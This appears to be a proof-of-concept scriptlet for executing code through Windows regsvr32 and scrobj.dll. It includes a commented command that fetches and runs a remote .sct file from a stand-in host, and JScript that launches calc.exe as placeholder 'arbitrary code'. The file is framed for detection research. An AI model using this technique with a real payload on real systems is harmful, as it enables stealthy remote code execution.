<?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> <!-- .sct files when downloaded, are executed from a path like this --> <!-- Please Note, file extenstion does not matter --> <!-- Though, the name and extension are arbitary.. --> <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> <!-- Based on current research, no registry keys are written, since call "uninstall" --> <!-- You can either execute locally, or from a url --> <script language="JScript"> <![CDATA[ // calc.exe should launch, this could be any arbitrary code. // What you are hoping to catch is the cmdline, modloads, or network connections, or any variation var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet>